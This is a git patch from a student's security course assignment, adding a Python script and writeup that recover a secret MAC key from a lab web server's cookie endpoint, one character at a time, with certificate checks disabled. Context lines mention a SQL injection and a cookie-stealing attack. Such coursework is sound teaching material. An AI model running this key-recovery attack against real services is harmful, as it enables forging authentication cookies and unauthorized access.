From 42065d116ddfb196edfde4c9d90fae72ea36bf19 Mon Sep 17 00:00:00 2001
From: Matt Strapp <matt@mattstrapp.net>
Date: Mon, 13 Dec 2021 21:54:54 -0600
Subject: finish ho2

---
 csci5271/ho2/crack6.py  | 24 ++++++++++++++++++++----
 csci5271/ho2/writeup.md | 28 ++++++++++++++++++++++++++++
 2 files changed, 48 insertions(+), 4 deletions(-)

diff --git a/csci5271/ho2/crack6.py b/csci5271/ho2/crack6.py
index 60b5a3b..55a9263 100644
--- a/csci5271/ho2/crack6.py
+++ b/csci5271/ho2/crack6.py
@@ -1,6 +1,22 @@
-# SHA! Key guesser
-import hashlib
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import string
 
-name = "admin"
-response = "a1a9f3ebd29ff76d45a609d98e0ec31e83dfbd4d"
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
+actual = ""
+key = "Z"*19
+for n in range(19, -1, -1):
+    res2 = requests.get("https://192.168.14.1/mac-cookie?username="+key,
+                        verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
+    for c in string.printable:
+        test = key[:n] + c
+        res1 = requests.get("https://192.168.14.1/mac-cookie?username="+test,
+                            verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
+        print(test, res1, res2)
+        if res1 == res2:
+            actual = c + actual
+            break
+    key = key[:-1]
+
+print("Key is", actual)
diff --git a/csci5271/ho2/writeup.md b/csci5271/ho2/writeup.md
index e752fcb..56d617d 100644
--- a/csci5271/ho2/writeup.md
+++ b/csci5271/ho2/writeup.md
@@ -95,3 +95,31 @@ The secret to figuring out the SQL injection was ~~trying everything~~ tuning th
 The main additional thing I did was start up a `SimpleHTTPServer` on port 8080 of the server I have SSH access to. The attack works because the server is making an HTTP request to that port with the cookie being that of the browser.
 
 # 6
+## Code
+```python
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import string
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+actual = ""
+key = "Z"*19
+for n in range(19, -1, -1):
+    res2 = requests.get("https://192.168.14.1/mac-cookie?username="+key,
+                        verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
+    for c in string.printable:
+        test = key[:n] + c
+        res1 = requests.get("https://192.168.14.1/mac-cookie?username="+test,
+                            verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
+        print(test, res1, res2)
+        if res1 == res2:
+            actual = c + actual
+            break
+    key = key[:-1]
+
+print("Key is", actual)
+```
+
+## Key
+`###################k`
-- 
cgit v1.2.3